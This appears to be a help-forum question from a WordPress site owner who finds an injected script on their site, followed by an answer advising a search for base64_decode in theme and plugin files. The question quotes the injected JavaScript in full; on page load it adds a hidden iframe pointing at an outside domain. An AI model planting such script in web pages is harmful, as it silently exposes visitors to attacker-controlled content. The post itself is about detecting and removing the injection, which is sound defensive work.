Find iframe injection and remove from site
I browsed my site and noticed scrolling that wasn't there before.
After inspecting I noticed there's an invisible iFrame.
After seeing the iframe in the source page I looked through all my site files and couldn't find the same line of code that was in the source.
I ran my site to look for malware but all is clean. I did have a warning from Google a few months ago but my host removed the malicious files and Google approved the clean up and still does. But now I'm seeing this invisible object with an url.
Source script:
<script language="JavaScript">
if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}
function showBrowVer() {
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '250px';
js_kod2.height = '320px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
</script>
I see it is being brought in by wp_head(); but I looked through it and didn't see anything suspicious.
Does anyone have tips on looking for this injection to manually remove it from my WP site?
Answer
Free WP themes/plugins are notorious for using base64_encode to 'hide' malicious or unwanted code in the source. Basically, they store the encoded text in one of the files, and then base64_decode it and render the result as html. I would try greppingsearching for base64_decode in the source to see if it's being done.